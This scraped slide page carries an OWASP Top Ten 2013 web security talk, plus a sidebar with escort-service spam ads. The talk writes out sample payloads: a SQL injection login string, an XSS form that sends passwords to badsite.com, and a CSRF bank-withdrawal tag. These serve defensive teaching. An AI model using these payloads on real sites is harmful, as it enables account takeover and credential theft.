Testing, job or game
Testing, job or gameTesting, job or game
Testing, job or game
 
Test Automation Techniques for Windows Applications
Test Automation Techniques for Windows ApplicationsTest Automation Techniques for Windows Applications
Test Automation Techniques for Windows Applications
 
Help them to help you
Help them to help youHelp them to help you
Help them to help you
 
Learning the Agile way
Learning the Agile wayLearning the Agile way
Learning the Agile way
 
How to bring creativity in testing
How to bring creativity in testingHow to bring creativity in testing
How to bring creativity in testing
 
Tester with benefits
Tester with benefitsTester with benefits
Tester with benefits
 
Doing things Differently
Doing things DifferentlyDoing things Differently
Doing things Differently
 
Testarea: Prieten sau dusman? Adrian speteanu
Testarea: Prieten sau dusman? Adrian speteanuTestarea: Prieten sau dusman? Adrian speteanu
Testarea: Prieten sau dusman? Adrian speteanu
 
Invatand prin explorare
Invatand prin explorareInvatand prin explorare
Invatand prin explorare
 
Tabara testare adrian matei
Tabara testare adrian mateiTabara testare adrian matei
Tabara testare adrian matei
 

Dernier

Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGSujit Pal
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...gurkirankumar98700
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 

Dernier (20)

Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAG
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 

The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20

  • 1. OWASP The OWASP Foundation http://www.owasp.org The OWASP Top Ten Most Critical Web Application Security Risks 2013/12/04 Simon Bennetts Mozilla Security Team, OWASP ZAP Project Lead psiinon@gmail.com Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.
  • 2. The OWASP Top Ten • Most Critical Web Application Security Risks Threat Agent Attack Vector Easy Weakness Prevalence Widespread Weakness Detectability Easy Technical Impact Severe Business Impact ? ? ? Average Common Average Moderate ? ? Difficult Uncommon Difficult Minor ? • A great place to start • Current list published in 2013 • Well known and well regarded • But … the vast majority of websites still have a high, critical or urgent issue 2
  • 3. The OWASP Top Ten A1: Injection A2: Broken Authentication and Session Management A3: Cross-Site Scripting (XSS) A4: Insecure Direct Object References A5: Security Misconfiguration A6: Sensitive Data Exposure A7: Mission Function Level Access Control A8: Cross-Site Request Forgery (CSRF) A9: Using Components with Known Vulnerabilities A10: Unvalidated Redirects or Forwards 3
  • 4. A1: Injection Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Easy Common Average Severe • Tricking an application into including unintended commands in the data sent to an interpreter • SQL, OS Shell, LDAP, Xpath, Hibernate… • Impact: SEVERE! • Unauthorized application access • Unauthorized data access • OS access… 4
  • 6. A1: Injection (SQL) • Example UI: Name: admin ʹ-- Password: ******* Login • Example code: String sql = “SELECT * FROM users where username = ʹ” + username + “ʹ and password = ʹ” + password + “ʹ”; • Expected SQL: SELECT * FROM users where username = ʹadminʹ and password = ʹc0rr3ctʹ 6
  • 7. A1: Injection (SQL) • Example UI: Name: admin ʹ-- Password: ******* Login • Example code: String sql = “SELECT * FROM users where username = ʹ” + username + “ʹ and password = ʹ” + password + “ʹ”; • Expected SQL: SELECT * FROM users where username = ʹadminʹ and password = ʹc0rr3ctʹ • Resulting SQL query: SELECT * FROM users where username = ʹadminʹ--ʹ and password = ʹanythingʹ 7
  • 8. A1: Injection • Prevention: • Use interfaces that provide a parameterized interface: • Prepared Statements • Stored Procedures • • Encode all user input • • Whitelist input Minimize database privileges OWASP SQL Injection Prevention Cheat sheet 8
  • 9. A2: Broken Authentication and Session Management Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Average Widespread Average Severe • HTTP is stateless • Session IDs used to track state, good as credentials to an attacker • Can be accessed via sniffer, logs, XSS… • Change my password, forgotten my password, secret questions … • Impact: sessions hijacked / accounts compromised 9
  • 10. A2: Broken Authentication and Session Management • Prevention: • Use standard implementations • Use SSL for ALL requests • Thoroughly test all authentication related functionality • Use SECURE & HTTPOnly cookies flags • Avoid XSS flaws 10
  • 11. A3: Cross Site Scripting (XSS) Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Average VERY Widespread Easy Moderate • Injecting malicious content/code into web pages • HTML / javascript most common, but many other technologies also vulnerable: • Java, Active X, Flash, RSS, Atom, … • Present in 68% of all web applications in 2011 • Can be present in form and URL parameters AND cookies 11
  • 12. A3: Cross Site Scripting • Impact: (XSS) • Session hijacking • Unauthorized data access • Web page rewriting • Redirect users (eg to phishing or malware sites) • Anything the web application can do… 12
  • 13. A2: Cross Site Scripting (XSS) Reflected Persistent 13
  • 14. A2: Cross Site Scripting (XSS) DOM 14
  • 15. A3: Cross Site Scripting • Forum: “Have you seen XYZ are being taken over?? (XSS) http://tinyurl/jdfgshr” XYZ – We’re being taken over! https://www.xyz.com/s=%3C%2Fdiv%3E%E2%80%9C%3Cscript%3Edocument.title%3D%E2%80%98XYZ%20 Search this site: Yes, we’re being taken over, but don’t worry: login to find out why this is a good thing! Username: Password: Login 15
  • 16. A3: Cross Site Scripting (XSS) found! XYZ – No Search Result https://www.xyz.com/s=%3C%2Fdiv%3E%E2%80%9C%3Cscript%3Edocument.title%3D%E2%80%98XYZ%2 Search this site: No search result found for: “</div><script>document.title=‘XYZ – We’re being taken over!’; Document.getElementById(‘results’).style.display=‘none’; </script> Yes, we’re being taken over, but don’t worry: login to find out why this is a good thing! <table><form action=‘http://badsite.com/gotcha’> <tr><td>Username:</td><td><input id=‘user’></td></tr> <tr><td>Password:</td><td><input id=‘password’ type=…” 16
  • 17. A3: Cross Site Scripting • View Source: (XSS) : <div id = “results”> <p>No search result found for: </p> <!-- start of users search term --> “ </div><script>document.title=‘XYZ – We’re being taken over!’; Document.getElementById(‘results’).style.display=‘none’; </script> Yes, we’re being taken over, but don’t worry: login to find out why this is a good thing! <table><form action=‘http://badsite.com/gotcha’> <tr><td>Username:</td><td><input id=‘user’></td></tr> <tr><td>Password:</td><td><input id=‘password’ type=… ” <!-- end of users search term --> : 17
  • 18. • A3: Cross Site Scripting Prevention: (XSS) • • Whitelist input • Encode output (e.g. using OWASP ESAPI) • • Don’t output user supplied input  If you must support user supplied HTML, use libraries like OWASP’s AntiSamy OWASP XSS Prevention Cheat sheet 18
  • 19. A4: Insecure Direct Object Reference Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Easy Common Easy Moderate • A direct reference to an object that is not validated on each request • user=psiinon@gmail.com • company=Mega%20Corp • account=7352820 • Typically in FORM and URL parameters (cookies less likely) • Impact: accounts and data compromised 19
  • 20. A4: Insecure Direct Object Reference • Attacker notices URL: acct=6065 • Modifies it to acct=6066 • Attacker can view (and maybe change?) the victims account 20
  • 21. A4: Insecure Direct Object Reference • Prevention: • Use per user or per session indirect object references (ESAPI supports integer and random mapping) • Validate Direct Object References on each request 21
  • 22. A5: Security Misconfiguration Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Easy Common Easy Moderate • Another multitude of sins  • Server / Application configuration • Lack of server and application hardening • Unpatched OS, services, libraries • Default accounts • Detailed error messages (e.g. stack traces) • Unprotected files and directories 22
  • 23. A5: Security Misconfiguration • Impact: • Server compromise • Exploitation of known vulnerabilities • Prevention: • Repeatable server and application hardening process • Patch OS, services, libraries • Strong architecture that ensures secure separation between components 23
  • 24. A6: Sensitive Data Exposure Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Difficult Uncommon Average Severe • Exposure of: • Credentials • Credit card numbers • Bank account details • Any sensitive data… • In: Databases, Files, Logs, Backups … 24
  • 25. A6: Sensitive Data Exposure • Impact: • Attackers access or modify sensitive data • Attackers use sensitive data in further attacks • Company embarrassment, loss of trust • Company sued or fined 25
  • 26. A6: Sensitive Data Exposure • Prevention: • Identify sensitive data • Store as little sensitive data as possible  • Protect with suitable mechanisms (file, db, element encryption, SSL) • Only use standard, well recognised algorithms • Check your implementation! 26
  • 27. A7: Missing Function Level Access Control Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Easy Common Average Moderate • UI showing navigation to unauthorized functions • Server side authentication or authorization checks missing • Server side checks relying solely on attacker provided information • Impact: • Unauthorized account and data access • Access to administrative functionality 27
  • 28. A7: Missing Function Level Access Control • Prevention: • Process for managing entitlements thats easy to update and audit • Deny access by default, require specific grants to specific roles for access to every function • Check workflow for correct state 28
  • 29. A8: Cross site request forgery Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Average Common Easy Moderate • Exploits sessions established in other browser windows or tabs • Impact: Attacker can perform any action on behalf of the victim 29
  • 30. A8: Cross site request forgery Browser 1 4 example.bank.com $$$ 5 2 3 bad.site.com <img src=“…”> <img src= "https://example.bank.com/withdraw? account=bob&amount=1000000&for=mallory" > 30
  • 31. A8: Cross site request forgery • Prevention: • Never allow GETs to change things • Anti CSRF tokens • Viewstate (ASP.NET) • OWASP CSRF Guard • Challenge-Response • Re-Authentication • CAPTCHA 31
  • 32. A9: Using Components with Known Vulnerabilities Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Average Widespread Difficult Moderate • As per the title! • Impact: • Full range of weaknesses, including injection, broken access control, XSS … • Minimal → complete host takeover and data compromise 32
  • 33. A9: Using Components with Known Vulnerabilities • Prevention: • Identify all components and versions in use • Monitor security of these components • Keep components up to date • Establish security policies governing use • If necessary add wrappers to disable unused or vulnerable aspects of components 33
  • 34. A10: Unvalidated Redirects and Forwards Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Average Uncommon Easy Moderate • Redirects are common and send the user to a new site .. which could be malicious if not validated! http://fail.com/redir.php?url=badsite.com • Forwards (Transfers) send the request to a new page in the same application .. which could bypass authentication or authorization http://fail.com/redir.php?url=admin.php 34
  • 35. A10: Unvalidated Redirects and Forwards • Impact: • Redirect victim to phishing or malware site • Attacker’s request is forwarded past security checks, allowing unauthorized function or data access • Prevention: • Avoid using them • Dont use user supplied data for destination • Validate any user data that must be used 35
  • 36. Where Next? • Read and understand the full document! • Read the OWASP Developers Guide • Watch the OWASP AppSec Tutorial videos on youtube • Re-examine your code! • Introduce a Secure Development Lifecycle • Use tools like the OWASP Zed Attack Proxy  36